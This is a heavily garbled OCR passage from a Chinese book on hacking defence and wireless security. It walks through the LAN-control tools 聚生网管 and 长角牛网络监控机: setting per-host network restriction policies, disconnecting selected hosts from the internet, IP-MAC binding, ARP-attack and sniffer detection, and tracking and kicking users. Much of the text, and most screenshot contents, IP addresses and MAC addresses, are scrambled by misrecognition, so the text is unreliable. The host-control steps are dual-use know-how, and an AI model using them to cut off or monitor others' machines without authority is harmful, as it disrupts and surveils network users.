。 EE = 一。。 一 。 -me 。 。- 一 -= 。 一 一- PT 


[step 图 在 主机 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “控制 全 部 主机 ”菜单 命令 ， 即 可 控 
制 全 部 主机 ， 如 下 图 所 示 。 

虽然 可 以 控制 全 部 主机 ， ove ye 并 没有 对 主机 进行 其 他 的 控制 。 
如 果 想 启用 各 种 控制 (如 下 载 、 聊 天 等 ) ， 双 击 某 台 主机 信息 ， 即 可 弹出 “新 建 策略 ?” 
消息 框 ， 将 看 到 “您 已 ER 
所 示 。 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


iP 地 址 ( 打 勾 控制 ) 主机 名 ( 京 击 修改 | (总) 上行 (214.40 K.。 (总 | 下 行 (72.69 KB/.. 
口 丙 192.163.0.104 控制 机 0.00 0.00 
FN 
网 192.163.0. 编 温 当前 策略 (P) 0.00 
网 192.168.0. 为 选中 主机 消 派 策略 (N) 0.00 
出 192.163.0. 批 妓 指派 策略 (Z) 0.00 
出 192.163.0. Wind 72.18 
192.163.0 oe 0.00 
站 1921 ee 全 者 主机 详 泗 泊 芋 信息 中) SF 
时 192.168.01 轩 计生 和 放生 000 
出 192.163.0. 修改 主机 MUM) 0.52 
出 192.163.0， 。。 喜 深 主机 们 000 
出 192.163.0. 断 开 选中 主机 公 网 连接 ID) oo00 
强制 断 网 (FP)( 试 用 版 不 提供 ) 
恢 得 选 中 主机 公 网 连接 (R) 
断 开 所 有 主机 公 网 连接 (A) 
恢复 所 有 主机 公 网 连接 (S) 
me 
聚 生 网 答 V2016 
的 您 已 经 定义 过 第 略 ， 现在 变 续 新 建 一 个 征 耻 吗 ? 


ET 


若 要 新 建 策略 ， 则 需要 单 击 “ 是 ” 按 
钮 ， 即 可 打开 “策略 名 ”对 话 框 ， 在 “请 
输入 策略 名 称 ” 文 本 框 中 输入 一 个 策略 的 
名 称 ， 人 例如“ 局域网 ”， 如 下 图 所 示 。 


策略 宪 X 


语 嘻 入 策 睁 名称 ; 确定 
| 


iss] 单 主 “ 确 定 ” 按 钮 ， 将 打开 “编辑 策 
由 [局 六 风 ] 的 内 容 ” 对 庄 组 ， 在 关中 分别 
置 “ 网 络 限制 ”“ 带 宽 限 制 ”“P2P 下 载 限 
制 ”“ 流 量 限制 ”“ 首 通 下 载 限制 ”“ 游 戏 
限制 ”“ 股 村 限制 ”“ 聊 天 限制 ”“ACI 规 
则 ”“ 时 间 设 置 ”等 选项 卡 ， 如 下 图 所 示 。 


统 把 我 骆 [局 域 列 ] 的 内 容 X 


全 蔡 下 下 载 限 齐 
图 对 本 有 至 
局 网 络 限制 
口 启用 WwW 访问 控制 
禁止 访问 WWW 
启用 反动 色情 站 点 庄 过 法 
澈 活 诗 定 义 网 址 列 专 控 制 规则 与 三 单方 元 
禁止 启 域 网 主机 使 月 其 它 HTTp 代 青 上 网 (如 SOCKS 代 理 | 
酚 止 局 域 网 主机 充当 代 班 服务 咒 | 进 免 不 当 扩 展 网 络 ) 


名 ACL 规则 
区 购 眼 制 
有 流 对 限制 


| 7 汤 聊天 限制 
网 邮件 阶 件 限制 
鲍 p2p 下 载 限制 


县 让 XiR 齐 
党 网 盘 做 博 限 拓 
| 


应 腹 民 制 规 则 来 访问 WWW 


局 在 醉 止 访 同 反馈 页 血 
现 仁 为 工作 时 间 ， 称 的 访问 已 经 被 到 止 ! 所 所 


回 启用 WWAW 访 问 历史 网 址 记录 


位 止 访问 局 域 网 内 1p 为 |0.0.00 的 主机 或 服务 器 


口 启用 高 级 网 将 控制 ( 清 昼 用 ) 
自动 检测 #f 隐 高 特殊 主机 ( 靠 规 ) 
检 涡 有 期 :60 秒 (>5) 号 高 时 间 : 180 | 秘 
启 月 主机 强制 隔 高 功能 ( 清 愤 月 ) 启用 主机 滨 制 阳 高 功能 (增强 ,请 愤 用 ) 
--- 当 惟 现 局 域 网 中 高 站 法 软件 碗 坏 网 阁 重 汛 对 . 可 以 启用 此 功 训 将 芋 阿 高 


主动 检 油 并 隔 高 特 算 主机 ( 增 深 ) 


WE | RBS | 
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设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 

gp 略 。 单 击 “ 配 置 策略 ” 按 
钮 ， 打 开 “ 策 略 编辑 ”对 话 框 ， 即 可 看 到 
添加 的 策略 ， 如 下 图 所 示 。 

Ses x 
注 : 为 了 前 却 窟 配置 策略 的 麻烦 ,我们 预 设 了 几 个 常 月 的 上 网 控制 策略 ,您 可 以 直接 ( 也 可 以 弟 辑 、 交 更 这 些 第 


覆 ) 泣 据 给 您 很 注 制 的 个 别 、 部 分 或 全 部 电脑 ; sd 在 你 广电 脑 指 派 eit 我 们 建议 您 闻 主 机 和 第 骆 的 对 
应 关系 导出 备份 [在 “主机 列表 ” 椎 右上 角 ) , 伪 伐 系 统 或 重 装 票 生 两 管 后 直 污 导入 。 


©O 只 际 刊 P2P 下 每 筑 腹 第 略 | 

| 
©O 口 陨 制 向 完 流 县 第 咯 导出 算 娩 | 
©O 号 际 制 录用 软件 第 梧 SN5 | 

| 
[| 撕 E 和 上 | 
[| | 
[ 完全 茜 皇 国 符 网 策略 


人 sse. mb 


注 1 ; 创建 策略 后 可 以 通过 “指派 策略 ”， 使 得 部 分 或 折 有 主机 共用 一 个 第 驹 。 
注 2 : 通过 “ 纤 丝 等 四 ”可 以 使 浊 司 一 等 略 下 所 有 氏 肪 多 上 网 权限 皮 生 六 变 , 无 到 单独 设 辕 . 


建立 好 策略 后 ， 用 户 可 以 在 主机 列表 
本 全 双击 其 他 “未 指派 策略 ”的 主机 指 
派 已 经 建 好 的 策略 ， 也 可 以 再 建 一 个 新 的 策 
略 。 若 想 再 建 一 个 策略 ， 双 击 该 人 台 主 机 ， 将 
弹出 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 
个 策略 吗 ? ”对 话 框 ， 如 下 图 所 示 。 


聚 生 网 管 V2016 


DW 您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 个 策略 吗 ? 


Ca a 


单 击 “ 是 ”按钮 ， 可 以 继续 新 建 一 个 
策略 ; 而 单 击 “ 否 ”按钮 ， 将 弹出 “重新 
指派 采 略 ” 对 话 框 ， 可 以 重新 指派 刚才 定 

义 的 和 略 ， 或 者 仍旧 保持 “未 指派 策略 ” 
状态 ， 设 置 完 成 后 单 击 “ 确 定 ” 按 钮 ， 即 
可 成 功 设 置 指派 策略 ， 如 下 图 所 示 。 


网 ， 
二 泊 策 咯 ( 旺 示 斋 完 、 网 址 ) 
未 指派 策略 


如 果 想 对 所 有 的 主机 或 者 一 部 分 主机 
a 一 个 策略 ， 要 在 “ 聚 生 网 管 ” 主 
机 列表 窗 格 中 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “批量 指派 策略 ”菜单 命令 ， 如 下 图 
所 示 。 


iP 地 址 ( 打 勾 控制 ) 主机 名 (点 主 修 改 )】 【总 ) 上 行 (0.04 KB/S) (总 ) 下 | 
口 于 192， 168.0.104 4 控制 机 0.04 0,12 
新 福生 克 (N) 


塘 温 当 策 第 略 (P) 
为 话 韦 主机 搭 斌 策略 [N) 


口 王 192.168.0.106 上 
品 ] 杜 192.168.0.107 上 


监 善 Windows 信 鸽 兴 喜人 G) 
查看 主机 详细 流 译 千 豆 由 

至 看 主机 详 纯 济 译 舍 昌 -已 洋 寺 
公 改 主机 这 了 肯 (M) 

至 荆 主 机 (有 


step 加 打开 “策略 指派 设置 ”对 话 框 ， 左 右 
两 侧 分 别 为 已 经 指派 策略 的 主机 和 未 指派 
策略 的 主机 ， 用 户 可 以 把 其 中 的 一 个 已 经 
建立 好 策略 的 组 或 未 建立 策略 的 组 里 面 的 
所 有 主机 ， 全 部 指派 到 右 侧 的 某 个 策略 组 
里 面 或 未 指派 的 策略 组 里 面 ; 右 侧 的 同样 
也 可 以 指派 到 左 侧 的 组 里 面 ， 如 下 图 所 示 。 


第 绰 拉 浅 设 时 x 
诗 选 定 策 略 ; 语 汉 直 策 牙 : 
未 后 ij 所 策略 ~ 局域网 
IP 闻 址 主机 各 IP 闻 址 主机 万 
El | ,caon> AFOIG-611211054 
过 中 | | 192 1680.106 DESKTOP-5CVBNG| 
全 部 >> 192.168.0.107 DESKTOP-D5KF15E 
< 全 部 192.168.0.109 
192.168.0.114 AFOIG-702111221 
192.168.0.102 
192.168.0.105 
192.168.0.101 
197.168.0.100 Y 
< > 


注 : 一 般 在 左边 下 拉 秦 内 逻 择 “未 演 派 党 中 ”， 则 旦 不 听 有 未 扰 派 沫 驹 的 主机 ， 然后 在 在 边 的 下 拉 按 启 圣 加 选送 你 刚 寺 全 
建 的 策 用 ， 然 后 可 以 在 左边 符 内控 性 SHIFT 刍 运 择 部 分 或 青 全 军 主 机 ， 然 后 所 中间 的 “ 延 中 ”或 戎 “全 部 ”， 则 这 些 未 捐 派 
策 路 的 主机 二 朱 祝 一 次 性 三 于 你 刚 本 亨 奸 的 策 路 。 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 安 
全 防御 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 
“IP-MAC 绑 定 ” 选 项 ， 打 开 “IP-MAC 绑 
定 ” 对 话 框 ， 在 其 中 可 以 设置 IP-MAC 绑 定 ， 
如 下 图 所 示 。 


IP-MAC 守 十 X 


回忆 局 IP-MACIE 直 嵌 定 
注 ; 在 启用 此 功能 之 前 诸 兢 保 局 域 刚 的 电脑 没 右 在 路 由 器 防火 管 碗 宪 交 搓 机 他 十 P-MAC 案 
十， 如 果 已 法定 法 取 消 . 然后 月 此 尝 定 功能 ,否则 有 可 能 遇 贡 后 域 网 网 洛 想 证 ! 


三 要 三 IP 瘾 址 MAC 地 址 主机 党 第 


导出 IP-MAC 么 | 
导入 IP-MAC 志 | 


只 于 出 MIAC 专 | 


品名 动 发 到 新 主机 并 进行 实 走 
口 支 现 非法 jp-MAC 纤 定时 ， 发 闫 本 止 沾 所 | 为 了 网 阁 安 全 ， 诗 不 亚 吾 宣 佬 改 jP ， 称 的 玩 认 IP 为 %src ， 法 再 次 烙 改 为 中 


性 玉 站 法 IP_MAC 和 证 81 ,新 开 法 十 机 从 两 江 村 
RR | 
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单 击 “ 获 取 IP-MAC 关 系 ” 按 钮 ， 即 
可 在 左 侧 的 窗 格 中 显示 获取 的 IP-MAC 关 
系列 表 人 信息， 然后 通过 单 击 “ 手 工 添加 绑 
定 ” 按 钮 进行 IP-MAC 关 系 的 绑 定 操作 ， 如 
下 图 所 示 。 


IpP-MAC 峙 定 xX 


回 言 呈 IP- MAC 地 址 纯 定 
注 : 在 启用 此 功能 之 前 ， 读 砚 保 请 域 网 的 电脑 没有 在 路 由 器 、 防 淡 拦 厌 省 交 沪 机 做 过 IP-MAC 泛 
如 宁 已 绑 定 请 区 湛 . 然后 用 此 者 定 功能 . 否则 右 可 能 影响 局 域 网 网 阁 即 通 ! 


定 A 


主机 名 1P 地 址 MA 地 址 主机 说 明 屠 取 IP-MAC 关 夭 
圆 AFOIG-611.，192.168.0.112 Ca8:00:00:9C:CCD1 AFOIG-511211054 手工 汰 加 绑 定 
圆 DESKTOp-5.，192.168.0.106 00:23:24:D9:B6:E5 DESKTOP-5CVB,... 删除 迁 中 线 坪 
四 DEsSkKTOP-,.. 192.168.0.107 58:FB:84:FB:58:10 DESKTOP-D5KF1.. 
5 192.168.0.109 TO:E7:2C:D3:11:24 __ 污 = 全 PEer 宝 | 
辑 | 网 党 科技 192.168.0.108 40:A5:EF:DE:A9:D3 网 阁 科 技 
圆 AFOIG-702. 192.168.0.114 COCB:38:7D:AG:0E AFOIG-702111221 导出 |p-MAC 去 
- 192.108.0.102 84;BE:52;3B;17;01 -- 
贺 |-- 192168.0.105 EQ:DO:CO:CO:1A'SD 导入 IP-MAC 表 
圆 -- 192.168.0.101 A4:44:D1:D3:49:7B 
加 |-- 192.168.0.100 A45E:60.16.7A'A1 RSdwac 雪 
口 振动 发 现 新 主机 并 运行 畦 定 


口 改 现 =E 法 I|P-MAC 浇 定 和 对 ,发送 树 止 消 护 | 为 了 网 络 安全 ， 诸 不 要 随 总 修改 IP， 你 的 默认 IP 为 %src ， 


口 ] 劣 琶 丰 去 PP-MAC 则 宗 对 , 新 开 访 于 机 公 网 许 柠 
ma | 


为 了 保证 无 线 局 域 网 的 安全 ， 防 止 
无 线 局 域 网 内 其 他 用 户 用 聚 生 网 管 扰 乱 无 
线 局 域 网 ， 该 工具 还 提供 了 防护 “网 内 其 
他 运行 记录 ”功能 ， 单 击 “ 安 全 防御 ” 按 
钮 ， 在 弹出 的 下 拉 列 表 中 选择 “网 内 其 他 
运行 记录 ”选项 ， 打 开 “ 局 域 网 本 软件 运 
行 记 录 ” 对 话 框 ， 聚 生 网 管 的 正式 版 可 以 
强制 测试 版 、 试 用 版 的 聚 生 网 管 退 出 ， 并 
且 记 录 下 运行 聚 生 网 管 的 主机 的 机 器 名 、 
运行 时 间 、 网 卡 、IP， 以 及 系统 对 其 处 理 结 
果 等 信息 ， 如 下 图 所 示 。 


说 再 次 修改 为 瑟 


贺 R# 罗 人 运 Fi 录 x 
局 域 网 内 其 他 主机 运行 本 软件 发 现 记录 回 强 制 试用 版 退出 | 
时 间 IP 地 址 主机 名 网 卡 地 址 处 理 结果 

> 2 


利用 聚 生 网 管 可 以 检测 当前 对 无 线 局 
域 网 所 害 最 为 严重 的 三 大 工具 : 无 线 局 域 


pe 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


网 终结 者 、 网 络 剪刀 手 和 网 络 执法 官 。 在 
“ 聚 生 网 管 ” 主 窗口 中 单 击 “ 安 全 防御 ” 
按钮 ， 在 弹出 的 下 拉 列 表 中 选择 “安全 监 
测 工 具 ” 选 项 ， 打 开 “ 人 安全 监测 工具 ”对 
话 框 ， 在 其 中 即 可 看 到 局 域 网 攻击 检测 工 
具 和 局 域 网 ARP 病 毒 、ARP 攻 击 专项 检测 工 
具 等 ， 如 下 图 所 示 。 

图 安全 监测 工具 x 


一 局 域 网 竟 杂 模式 节点 检测 本 具 
本 工具 可 以 检测 局 域 网 内 网 卡 处 于 混杂 模式 的 节点 ,以 发 现 脐 探 软件 或 其 他 网 管 类 软件 


heW | 
二 、 局 域 网 攻 赴 检测 本 县 
系统 可 以 检测 当前 局 域 网 二 大 工具 软件 : 局 域 网 终结 者 、 网 阁 茵 刀 手 、 网 络 执法 官 
| 


、 局 域 网 ARP 病 雪 、ARP 攻 圭 专 项 检测 工具 


(建议 不 超过 10) 

器] 启用 局 域 网 ARP 攻 去 防御 功能 
自动 向 局 域 网 发 送 ARP 攻 去 免疫 信息 
检测 到 ARP 攻 去 时 ， 自 动 加 大 免疫 力度 0 
检测 到 ARP 攻 去 时 记录 危险 主机 

ARP 攻 击 记 史记 录 : 
时 间 IP 地 址 主机 名 网 卡 地 址 i 
本 a 


单 击 “局域网 攻击 检 测 工具 ”栏目 中 
的 “开始 检测 ”按钮 ， 即 可 打开 “局 域 网 
攻击 软件 检测 工具 ”对 话 框 ， 如 下 图 所 示 。 
雯 局 城 网 攻 二 软 SMITR x 
开始 检测 


| IF 地址 检测 结果 


单 击 “ 开 始 检测 ”按钮 ， 即 可 打开 是 
否 使 控制 服务 处 于 停止 状态 提示 框 ， 如 下 图 
所 示 。 
重要 提示 
@ 在 进行 攻击 工具 检测 时 聚 生 网 管控 制服 务必 须 午时 停止 ， 


请 您 首先 停止 一 下 控制 服务 ， 等 检测 完 尝 再 台新 启动 ! 


请 问 控制 服务 现在 是 处 于 停止 状态 吗 ? 
|| a 


[step 辆 单 击 “ 是 ”按钮 ， 即 可 检测 整个 无 线 局 
域 网 中 是 否 存在 无 线 局 域 网 攻击 ， 同 时 将 检测 
的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 
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局 说 疯 攻 二 软件 习 齐 械 只 一 x 


IEI 


亚 地 直 梯 入 全 呈 
ji 192 169.0 112 正在 运行 攻击 控件 薄 卜 摊 科 件 ! 癌 


单 击 “ 聚 生 网 管 ” 窗 口中 的 “扩展 插 
按钮 ， 打 开 “ 扩 展 插件 ”对 话 框 ， 在 
其 中 即 可 看 到 聚 生 网 管 自 带 的 扩展 工具 ， 
如 下 图 所 示 。 


辆 扩展 括 件 Xx 


启动 际 生 网 管 外 未 记 脑 宫 动 注 制 占 ( 仅 全 能 版 提供 | | 


怪 生 网 区 外 来 电脑 上 管制 禹 呈 大 私 圣 (北京 ) 软件 工程 有 限 公司 淮 出 的 一 就 专门 月 于 防范 外 来 电 
腑 私自 全 入 到 全 可 内 部 局 若 网 中 访问 内 网 服务 赤 或 号 凶 电 胶 的 共享 资源 、 杜 活 绩 专 传 滩 的 一 奖 
内 网 安全 管 还 只。 相 工 只 可 以 本 内 网 服务 器 或 其 他 主机 ， 同 时 也 可 >j 莹 
止 内 网 电脑 主动 注 接 外 六 电脑 ， 并 可 以 训 录 外 六 电脑 的 |p、MAC 地 址 等 情况 ， 从 而 可 以 三 车 
生 网 管 系统 一 起 才 胎 网 管 人 员 更 好 池 加 浑 内 网 管 浑 、 防 范 风险 ， 


局 动 罕 生 网 管 主机 异 宗 容 报 工 且 ( 仅 全 能 椒 提 供 ) 


ie ee [ 谅 软 件 工程 有 有限 公司 推出 的 一 康 和 对 局 城 网 . 

网 关键 服务 严 ， 工 作 站 或 其 他 桂 殊 主 机 的 实时 信 测 工 上 县. 谣 过 此 苞 报 工 县 ,可 以 在 被 监 
ER 进 过 最 件 、 手 机 短信 ( 衬 短 信 设 备 雯 持 ) 等 方式 迅速 洽 乔 给 管理 总 ， 
倒 于 管理 只 及 时 洱 取 措施 进行 规 涯 和 修复， 防止 出 现 关键 应 用 中 岂 而 无 人 响应 的 状态 。 聚 生 
网 管 局 域 网 主机 异常 党 报 工具 作 为 展 生 网 管 条 统 的 秆 二 个 扩展 括 忻 ， 深化 了 民生 网 管 条 统 的 
网 络 行 为 监控 功能 ,进一步 深化 了 网 阁 管 理 。 


代 玛 扫 疾 器 叶 大 势 至 [北京 ) 玫 件 工程 有限 公 司 准 出 的 一 教 扫 痊 局 域 网 内 部 代理 弧 务 问 的 工具 ， 
可 以 以免 局 域 网 内 部 让 脑 充当 代理 港务 器 或 者 通过 代 焉 服务 器 上 网 而 引发 的 网 阁 安 宇 问 是 ; 
代 焉 扫 诱 丧 与 到 生 网 各 系 坑 的 高 效 谍 合 . 可 以 为 企 专业 单位 内 部 局 域 网 洗 侍 全 方位 的 网 冶 蜂 
控 、 安 全 防护 功 训 | 


局 动 避 生 网 管 网 卡 沱 杂 模式 检测 工具 ( 仪 全 能 版 控 供 ) 


票 生 网 管 网 卡 小 杂 模 式 检 测 工 具 是 大 劳 至 (北京 ] 软件 工程 有 限 公 司 开发 的 一 款 专 门 检测 局 域 
网 内 处 于 小 杂 棕 式 网 卡 的 包 摘 ,从 而 可 以 防止 内 网 电 腑 私自 冯 装 网 管 软 件 、 防 止 支 靳 Sniffer 腺 
探 软 件 、 防 止 去 将 wireshark 惠 探 才 件 等 ， 从 而 更 好 翰 保 访 内 网 的 网 络 去 全 和 商业 机 癌 。 


启动 素 生 网 管 远程 管理 工 只 ( 仅 全 毕 版 树 人 革 } 
桶 生 网 管 远程 管理 技术 (Remote Management Technology , 简称 RMT ) 呈 一 就 守 对 后 域 
网 的 写 规 管理 工 县 . 裔 过 RMT ， pp pe be 


任何 软件 , 网 管 人 吕 可 以 实现 对 局 域 网 电 蒋 【单个 或 震 批 县 ) 进行 远程 开机 、 运 程 关 机 
重启、 远程 注 冲 等 柑 作 ， 方 使 了 内 网 管理 ，RMTv1 .0 本 成 珠 生 网 和 系统 中 , 怀 生 Er 
起 服务 于 企业 的 网 洛 管理 。 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 全 局 
设置 ”按钮 ， 即 可 打开 “运行 设置 ”对 话 框 ， 
在 “系统 设置 ”选项 下 可 以 对 软件 启动 、 托 
盘 图 标 、 呼 出 热 键 、 密 码 保 护 、 软 件 CPU 占 用 
设置 等 属性 进行 相应 的 设置 ， 如 下 图 所 示 。 


系统 设置 ”优先 级 设 种 
软件 户 动 设 置 
Language Select: | Chinese 多 
口 电 脑 启动 时 言 动 运行 口 ] 软件 运行 月 转 为 注 制 状态 
账号 设置 | 口 和 时 认 便 用 上 次 账 三 登录 

口 监控 总 外 中 断 对 言 动 至 新 加 载 - 重启 软件 生效 
口 软 件 运行 一 般 对 间 后 自动 释放 内 存 。 |8 。 靖 | 小 时 重启 软件 生效 
口 定时 自动 关机 |18 咎 | = [0 国 分 -重启 生效 
鉴 深 定时 重新 时 间 | 。 5| 私 厨 可 强度 : [50 |( 夸 议 不 要 乱 过 50) 

回 记录 日 志 到 数据 库 ， 并 目 当日 志 达 到 | 500 。 | M 时 瑟 动 入 份 并 创建 条 39 数据库 。 


器] 软件 隐 芝 运行 --- 改 认 噬 出 热 儿 ; ALT + F1 
团 议 部 任务 栏 富 示 调 低 
呼出 执 访 设置 
请 您 在 右 山 古 十 按 下 志 插 天 | 
口 腑 出 时 客 码 尼 护 
口 程 序 关闭 时 密码 保护 。 ( 注 : 默认 味 出 热 钴 : ALT+F1 ) 
口 开 启运 程 双 记功 能 ”对 启 密码 : 再 入 栓 入 密码 : | | 
实时 流 且 园 最 大 克 度 值 设 置 。 | 500K ~ 
钦 件 运行 CPU 点 用 设 定 “| 效 率直 (CPU 占用 十) 一 ( 重 语 监 近 生效 ) 
ABR 本 | 


选择 “优先 级 设置 ”选项 卡 ， 在 其 
中 即 可 对 软件 进行 优先 级 设置 ， 设 置 完 毕 
后 ， 单 击 “ 保 存 设 置 ” 按 钮 即 可 ， 如 下 图 
所 示 。 


图 运行 设 嘻 x 


软件 优先 级 设计 
启用 网 党 应 用 优先 级 设 辐 (QQOS] 
〇 号 用 全 局 白 名 单 设 略 。” 门 局 用 全 局 符 名 单 设置 
加 | 


口 ] 宕 用 基于 协议 特征 约 优 先 级 程序 转发 没 营 


QQ 和 传 立 件 
QO 截图 


| 


14.4.2 ”长 角 牛 网 络 监控 机 


长 角 牛 网 络 监控 机 《网 络 执法 官 ) 只 
须 在 一 台 机 器 上 运行 ， 可 穿 透 防火 墙 ， 实 
时 监控 、 记 录 整 个 无 线 局 域 网 用 户 上 线 情 
况 ， 可 限制 各 用 户 上 线 时 所 用 的 P、 时 段 ， 
并 可 将 非法 用 户 踢 下 无 线 局 域 网 。 本 软件 
适用 范围 为 无 线 局 域 网 内 部 ， 不 能 对 网 关 
或 路 由 器 外 的 机 器 进行 监视 或 管理 ， 适 合 
无 线 局 域 网 管理 员 使 用 。 


1. 查看 主机 信息 


利用 该 工具 可 以 查看 无 线 局 域 网 中 
各 个 主机 的 信息 ， 例 如 用 户 属 性 、 在 线 记 
录 、 记 录 碍 询 等 ， 其 具体 操作 步骤 如 下 : 
在 下 载 并 安装 “长 角 牛 网 络 监 控 
机 ”软件 之 后 ， 选 择 “ 开 始 ” 一 “所 有 应 
用 ”一 Netrobocop 菜 单项 ， 即 可 打开 “设置 
监控 范围 ”对 话 框 ， 如 下 图 所 示 。 
[step 图 在 设置 完 网 卡 、 子 网 、 扫 描 范 围 等 属 
性 之 后 ， 单 击 “ 添 加 /修改 ”按钮 ， 即 可 将 
设置 的 扫描 范围 添加 到 “监控 如 下 子 网 及 IP 
段 ” 列表 中 ， 如 下 图 所 示 。 
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六 设置 反 指 子 陪 立 F 段 
选择 陪 卡 : |Atheros LIL Bigsbit Ethernet 10/100/1000Base-T Con ~ 

阿 卡 描述: 上 theros Li Bigabit Fthornot 1D071DDZ1D0DBaso-T 
子 网 : [TF:192.168.0.104/j24 [192.168.0.1 - 192.168.0.254 


扫 指 范 国 : 192.166.0.1 - [55602654 添加 /从 改 | 
申 控 如 下 子 网 及 名 : 


Ne 


™ 


手工 操作 ， 取 消 自动 运行 


”不 扫 指 确定 || 退出 | 


六 设置 扫 指 子 阿 AT 段 


渤 接 网 卡 : |Atheros LI Bigsbit Ethernet 10/100/1000Base-T Con ~ 
浆 卡 描述 : htheros LI Bizgsbit Fthornot 1071DD71D0D0Baso-T 


(i 


子 网 : [TF:192. 168.0.104;24 [192.168.0.1 - 192.168.0.254 
扫描 范围 : 2.168.0.1 — |192. 168.0.254 添加 /修改 | 
上 监控 如 下 子 网 及 IP 投 : 


vw 


手工 操作 ， 取消 自动 运行 


"扫描 | 确定 || 退出 | 


选中 刚 添加 的 IP 段 后 ， 单 击 “ 确 定 ” 
按钮 ， 即 可 打开 “长 角 牛 网 络 监 控 机 ” 主 
窗口 ， 在 其 中 即 可 看 到 设置 IP 地 址 段 内 的 主 
机 的 各 种 信息 ， 例 如 网 卡 权 限 地 址 、IP 地 
址 、 上 线 时 间 等 ， 如 下 图 所 示 。 


轩 长 名和 4 网 浙 妾 检 帆 以 用 题 3.56 -~ a x 
系 婉 T] 设 秆 [5】 下 户 [IU】 坎 8[D】 半生 [MH) 
[EE bad 导 8 省 出 | 戈 记 7 区 辣 | 


| 与 藉 如 / 主机 /用户 | | | | 
好 1 稳 轨 一 2017-00-46 9.37: 城 -一 网卡 生产 夏至 不 评 
2. 0.0. 106 0 1 201T00-15 09.37; 姐 一 
好 ! 句 WR /po 2047-09-46 09 37: 妈 一 同上 FE 二 产 厂 深 不 评 
ge 168 份 【有 二 为 固 " 主 他 器 ] 2047-06-45 09 37 好 一 牛 产 厂 部 逢 
9 ee.o ,mm 从 一 2017-09-45 09:37:#7 一 - 重卡 生产 厂 了 了 下 评 


Tep109 Udp;19 | 运 和 5 0000'57” 并 同 于 本 交代 65 秒 后 开 已 答 理 芒 般 ， 


在 “长 角 牛 网 络 监控 机 ”窗口 的 计算 
机 列表 中 双击 需要 查看 的 对 象 ， 即 可 打开 
“用 户 属性 ”对 话 框 ， 如 下 图 所 示 。 


月 户 层 性 Xx 
- 用 户 找 访 | 
网 卡 地 址 [SEE 过 :下 于 产 厂 京东 
用 户 注释 | 同 卡 生 产 厂家 不 详 | 保存 | 


IT 地 址 [192 580112 

组 /主机 ;用 户 WORRGEDUT /AFOIG-611211054 /AMFDIG-6ll2llr5d 
首次 上 续 名 1!7-08-15 09:37:46 - 2011-06-15 09:37:53 | 
林 裕 上 北 BUT08-15 09:37:46 = 当前 f 


图 历史 记录 | 仿 设置 权限 | 人 用 除 用 户 | 关闭 | 


pa | 


单 击 “ 历 史记 录 ” 按 钮 ， 即 可 打开 
“在 线 记 录 ” 对 话 框 ， 在 其 中 查看 该 计算 


机 上 线 情况 ， 如 下 图 所 示 。 


| 在 线 记 录 ~ 


用 户 : [C9-600030-C0-D1 [生产 家 网 下 生产 守 XT 许 
注释 : | 稀 卡 生产 厂家 不 


| 名 下 地 址 域 /主机 / 用户 
@ 192.163 0.112 WORESRDUP / AFOLG-611211054 ... 


上 污 时 间 


2017-08-15 09: 37:46 


区 


Et Se 导出 加 


单 击 “ 导 出 ”按钮 ， 即 可 将 该 计算 机 
的 上 线 记 录 保 存 为 文本 文件 ， 如 下 图 所 示 。 


中 Tem5E93 - 记事 本 一 口 xX 
文件 (站 ” 坊 辑 (E) 枪 FRIO) 查看 (V) 帮助 (H) 
长 角 吓 网 络 监控 机 da 鞭 革 


了 网卡 生 
并 | 线 1 次 ， 时 四 0 于 0; rs i 
1 时 | 


于 2017-08-15 09:39:52 。 
家 不 详 


日 0 天 0 \ 时 0 分 


step 加 在 “长 角 牛 网 络 监 控 机 ”窗口 中 单 
击 “ 记 录 查 询 ” 按 钮 ， 即 可 打开 “记录 查 
询 ” 窗 口 ， 如 下 图 所 示 。 


于 综 IT]。 设 入 [S] 用 户 山 ] 改 树 IDj。 宙 助 IH] 
二 国 本 网 用 户 | 图 也 务 此 串 三 记 予 析 间 | 


五 找 对 

Rs 一 所 有 用 户 一 

OR: 一 所 有 有 用户 一 
刘 相 符 : %? 
姐 / 主 机 /用 户 包 外 含 : 
| 
注释 包含 : 


了 Is 上 .0.0.0 


在 嫩 时 间 : 12017-07-15 m3 和 5 一 
一 |2017-6-15 m3 5 二 


持 纺 在 线 ! | 如 所 上 
下 续 原 因 : | 一 仔 合 转 因 一 了 | 
动 导出 


晤 下 把 


月 疡 总 澈 :6 在 沪 5 砷 去 0 


Tcp:92 Udp:19 运行 00:02'55" 试 月 怀 本 ,将 在 27 分 补 启 入 来 过 于 四 骨 ， 


在 “用 户 ” 下 拉 列 表 中 选择 要 查询 用 
户 对 应 的 网 卡 地 址 ; 在 “在 线 时 间 ” 文 本 框 中 
设置 该 用 户 的 在 线 时 间 ， 然 后 单 击 “ 查 找 ” 
按钮 ， 即 可 找到 该 主机 在 指定 时 间 的 记录 ， 
如 下 图 所 示 。 
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二 长 信守 网 洛 全 榨 机 斌 与 后 v3.56 
了 IT 设 王 5】 局 户 岂 】 汶 关 ID] 鼠 呈 (HH] 
包 本 tk 二 | 图 本 PR 户 | 国 所 5 由 咸阳 | 
豆 志 对 委 


>] 主 识 睛 
用 户 一 所 有 了 用户 一 if 15 1 
各 也 一 入 6 ? 
一 6 ) 117-08- 
通 3 季 : 57? DH-60-00- 和 -Cr > 1 0 7-08-1 
狂 / 主 所 /用 己基 基 合 00-23-24-I19-B6- 古 192.169.0.1 GE UP / DES3XTOF 117-08- 
| [ P403C0- -0079 » 192.100.0.1 一 2017-00-15 0 妃 


往 祥 已 癌 


社 经 站 款 : 册 4 报 外 
下 载 F 四 : | 一 和 芷 秋色 同一 *] 
二 沁 找 动 导出 | 

本 
ga [时 


用 户 关 元 芷 法 6 非法 0 


Tcp:128 Udp:19 运行 04'23" 


并 用 重 本 ,本 在 25 分 钟 后 管束 管理 功 配 . 


Istep 园 在 “长 角 牛 网 络 监控 机 ”窗口 中 单 击 

